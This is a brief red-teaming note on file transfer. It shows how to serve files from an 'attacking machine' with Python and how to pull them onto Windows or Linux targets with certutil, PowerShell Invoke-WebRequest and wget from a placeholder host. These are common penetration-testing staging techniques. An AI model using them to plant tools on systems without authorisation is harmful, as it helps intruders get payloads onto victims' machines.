File Transfer

Info, Red Teaming, 2023

Description :

File transfer between Linux and Windows.

Before talking about how to transfer a file, let’s start by how you can host a server on your attacking machine.

Using Python

python3 -m  http.server  PORT_NUMBER

Now let’s see how you can tranfer files on windows and linux


cmd :

certutil.exe -urlcache -f http://X.X.X.X:PORT/FILE_NAME FILE_NAME

powershell :

powershell -c "Invoke-WebRequest -Uri 'http://X.X.X.X:PORT/FILE_NAME' -OutFile 'PATH\TO\FILE'"


wget http://X.X.X.X/FILE_NAME  FILE_NAME

There is another way to transfer files using scp command where you don’t need to host a server on your machine but you must have the credentials of the machine that you will transfer the file to.